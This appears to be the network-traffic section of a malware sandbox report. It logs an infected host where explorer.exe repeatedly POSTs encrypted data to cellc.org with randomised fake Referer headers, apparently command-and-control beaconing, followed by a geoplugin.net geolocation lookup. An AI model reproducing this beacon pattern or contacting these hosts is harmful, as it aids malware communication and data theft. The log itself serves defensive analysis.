                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.449741179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812550068 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://qiehbuqbrmnvwc.com/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 129
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:06.812573910 CEST129OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 62 48 b0 a6
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vubH~eIhAF?&8 KD F&
                                                                                                                                                                                                                                May 8, 2024 16:41:07.918659925 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:07 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                3192.168.2.449742179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297665119 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://orvskgrekvfetnl.net/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 177
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:08.297687054 CEST177OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 7a 54 c0 e0
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vuzTK`L}SIQ":_F37\5WW[z<Q3((FP&Th].
                                                                                                                                                                                                                                May 8, 2024 16:41:09.417098045 CEST312INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:09 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 6b 4d f1 35 05 f5 fd 5e fe 97 ec ae 31 da 2d da f5 6c 63 1a 99 98 ac dc 61 d0 37 01 20 9c 0d 98 5c 2b 61 51 ad 94 67 e1 5d aa 4d 04 38 63 28 1e 90 21 a4 71 4d eb 99 28 63 ce 33 c8 f3 ef 39 24 d2 4f b0 5f c7 a5 0f 40 51 3e d6 1b b7 ac 9e 57 d5 99 2e 6b 2a bc a8 a9 c8 b3 84 99 26 bb 1f 18 bc df 99 a0 06 15 30 47 f6 94 b0 00 e7 9e 2d 23 c5 7c 85 fb 4a f3 a9 42 a0
                                                                                                                                                                                                                                Data Ascii: #\6kM5^1-lca7 \+aQg]M8c(!qM(c39$O_@Q>W.k*&0G-#|JB


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                4192.168.2.449744179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549710035 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://ayiplbxojpvv.org/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 110
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:19.549734116 CEST110OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 08 6b 2c 90 f4 76 0b 75 2b 35 e0 a7
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA ,[k,vu+59c$dg1
                                                                                                                                                                                                                                May 8, 2024 16:41:20.656434059 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:20 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                5192.168.2.449745179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026859999 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://cqileharharpgfrs.com/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 183
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:21.026881933 CEST183OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 50 0e b1 8b
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vuP`F[y`r&Ud-~Dv5;H%{3TCSW^&oK7;\
                                                                                                                                                                                                                                May 8, 2024 16:41:22.106245995 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:21 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.449747179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:22.482662916 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://uyobkmevwtj.org/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 191
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:22.482688904 CEST191OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 56 08 b9 bc
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vuVBchelJE3Y118N!oNB+<X%NHRb=9_v&yM(
                                                                                                                                                                                                                                May 8, 2024 16:41:23.576873064 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:23 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.449748179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944554090 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://cnojjwiexgft.net/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 292
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:23.944581985 CEST292OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 61 29 cf fe
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vua)G<QTN@4:7 tdPdxT5gR=+W*6'!L1u(/X{LB8scglK\9Ex!L0
                                                                                                                                                                                                                                May 8, 2024 16:41:25.047538042 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:24 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.449749179.159.229.64802580C:\Windows\explorer.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:25.414324999 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Referer: http://niqqkedjvbevod.org/
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                Content-Length: 127
                                                                                                                                                                                                                                Host: cellc.org
                                                                                                                                                                                                                                May 8, 2024 16:41:25.414350986 CEST127OUTData Raw: 3b 6e 21 17 f5 c9 6d 25 df a8 c8 76 03 08 7f ca 7d 79 bd e4 18 04 94 66 09 7c 0b e5 49 b7 c4 6f ed 2d b6 5d 71 64 2b 18 ec 9e 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 24 02 f1 e1
                                                                                                                                                                                                                                Data Ascii: ;n!m%v}yf|Io-]qd+? 9Yt M@NA -[k,vu$3cZnfdC~ryTDqGM
                                                                                                                                                                                                                                May 8, 2024 16:41:26.490622044 CEST510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                Server: nginx/1.26.0
                                                                                                                                                                                                                                Date: Wed, 08 May 2024 14:41:26 GMT
                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                9192.168.2.449752178.237.33.50802004C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                May 8, 2024 16:41:36.030019999 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                Host: geoplugin.net
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                May 8, 2024 16:41:36.341526985 CEST1139INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Wed, 08 May 2024 14:41:36 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                content-length: 931
                                                                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                cache-control: public, max-age=300
                                                                                                                                                                                                                                access-control-allow-origin: *
